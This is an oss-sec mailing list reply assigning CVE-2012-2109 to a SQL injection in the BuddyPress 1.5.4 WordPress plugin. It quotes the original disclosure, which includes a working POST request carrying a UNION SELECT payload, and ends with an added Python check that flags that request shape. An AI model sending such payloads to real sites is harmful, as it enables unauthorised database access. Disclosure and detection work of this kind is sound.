oss-sec mailing list archives

Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4


From: Kurt Seifried <kseifried () redhat com>
Date: Mon, 16 Apr 2012 13:36:14 -0600

On 04/15/2012 03:05 AM, Henri Salo wrote:
Hello,

Can I get a 2012 CVE identifier for the WordPress BuddyPress plugin
SQL injection?

Affected: 1.5.4
Fixed: 1.5.5
Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/
OSVDB: http://osvdb.org/show/osvdb/80763
Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to
say anything about this issue)

Please use CVE-2012-2109 for this issue.

http://seclists.org/bugtraq/2012/Apr/4
"""
Hi,

I would like to disclose a SQL injection vulnerability in the BuddyPress
plugin affecting the latest versions. This issue was reported to the
developers and resolved in version 1.5.5. So, I suggest that everyone who
has this plugin on their blog update to the latest version, if you haven't
done so yet. An example of a POST message with SQL injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+


"""

- Henri Salo


- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

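
A defensive check for the request shape quoted in the message above, as an added example that is not part of the original thread or of BuddyPress itself: it decodes a form-encoded POST body and flags an `activity_widget_filter` request whose `page` value is not a plain number, carries a nested parameter behind an encoded `&`, or contains SQL tokens. Treating `page` as numeric-only and the function and constant names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

WATCHED_ACTION = "activity_widget_filter"  # action name from the quoted request
NUMERIC_PARAMS = {"page"}                  # assumption: page is a plain page number
SQL_TOKENS = re.compile(r"\b(?:union|select)\b|--|;", re.IGNORECASE)

# Request body as quoted in the advisory above.
ADVISORY_BODY = (
    "action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),"
    "(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+"
)
# Constructed benign body for comparison.
BENIGN_BODY = "action=activity_widget_filter&page=2"


def inspect_body(body):
    """Return (parameter, reason) findings for one form-encoded POST body."""
    params = parse_qsl(body, keep_blank_values=True)
    if dict(params).get("action") != WATCHED_ACTION:
        return []
    findings = []
    for name, value in params:
        # A parameter expected to be numeric must consist of ASCII digits only.
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((name, "non-numeric value"))
        # %26 and %3d decode to & and =, so the decoded value can carry
        # a second name=value pair that the outer parser never saw.
        for nested, _ in parse_qsl(value.partition("&")[2]):
            findings.append((name, "nested parameter: " + nested))
        if SQL_TOKENS.search(value):
            findings.append((name, "SQL tokens"))
    return findings


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_body(body))
```
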

